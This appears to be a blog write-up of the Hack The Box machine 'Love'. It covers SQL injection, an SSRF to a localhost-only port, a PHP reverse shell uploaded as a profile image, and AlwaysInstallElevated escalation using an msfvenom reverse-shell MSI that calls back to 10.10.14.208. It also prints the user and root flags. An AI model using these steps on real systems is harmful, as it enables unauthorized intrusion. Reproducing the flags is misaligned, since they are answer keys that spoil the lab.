kedaegan.github.io

Love

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Port 80 Gobuster Scan:

Port 80 Nikto

Port 443 SSLScan:

The Voter parameter on the main page is vulnerable to SQL injection:

Discovered Databases:

Password hash from dump on admin database

Port 5000 shows forbidden pages

Initial Foothold

http://staging.love.htb/beta.php has a file-scanning PHP page.
Hosted a test file and it uploaded:

Put in http://127.0.01:5000/ because I suspect the forbidden page is listening on localhost only and this would possibly retrieve the index:

The profile image upload accepts PHP files.
Copied a Windows PHP shell from https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php
Uploaded as profile photo while listening and received a shell

User.txt Proof Screenshot


User.txt Contents

255e0a893c609d07f01c20f029eae609

Privilege Escalation

AlwaysInstallElevated

(Link in the pic is valid)

Created a reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.208 LPORT=5555 -f msi -o shell.msi
Uploaded shell.msi
Executed the MSI

Root Screenshot Here:

Root.txt Contents:

bd7e6637dc0f7d777d416977d908b04f